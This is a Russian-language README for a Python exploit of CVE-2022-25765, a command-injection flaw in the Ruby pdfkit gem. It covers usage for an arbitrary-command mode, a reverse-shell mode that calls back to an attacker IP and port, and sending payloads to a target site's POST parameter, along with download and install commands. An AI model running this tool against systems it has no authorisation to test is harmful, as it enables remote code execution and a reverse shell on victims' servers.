
Эксплойт для CVE-2022–25765 (pdfkit) - Инъекция команд

Нравится этот репозиторий? Поставьте нам ⭐!
Только для образовательных целей и авторизованных исследований безопасности.
@UNICORDev от (@NicPWNs и @Dev-Yeoj)
Пакет pdfkit начиная с версии 0.0.0 уязвим к инъекции команд, поскольку URL-адрес не проходит должную санитизацию.
Ruby-гем pdfkit часто используется для преобразования веб-сайтов или HTML в PDF-документы. Уязвимые версии (< 0.8.7.2) этого программного обеспечения могут получить специально сформированный URL, содержащий команду, которая будет выполнена. Данный эксплойт генерирует исполняемые URL-адреса или отправляет их на уязвимый веб-сайт, работающий под управлением pdfkit.
python3 exploit-CVE-2022–25765.py -c <команда>
python3 exploit-CVE-2022–25765.py -s <локальный-IP> <локальный-порт>
python3 exploit-CVE-2022–25765.py -c <команда> [-w <http://target.com/index.html> -p <параметр>]
python3 exploit-CVE-2022–25765.py -s <локальный-IP> <локальный-порт> [-w <http://target.com/index.html> -p <параметр>]
python3 exploit-CVE-2022–25765.py -h
-c Режим произвольной команды. Укажите команду для генерации произвольной полезной нагрузки.
-s Режим обратной оболочки. Укажите локальный IP и порт для генерации полезной нагрузки обратной оболочки.
-w URL веб-сайта, работающего под управлением уязвимого pdfkit. (Опционально)
-p Параметр POST на веб-сайте, работающем под управлением уязвимого pdfkit. (Опционально)
-h Показать это меню помощи.
Загрузить exploit-CVE-2022-25765.py с GitHub
Загрузить exploit-CVE-2022-25765.py с ExploitDB
searchsploit -u
searchsploit -m 51293


pdfkit Version 0.8.6
pdfkit Versions < 0.8.7.2
gem install pdfkit -v 0.8.6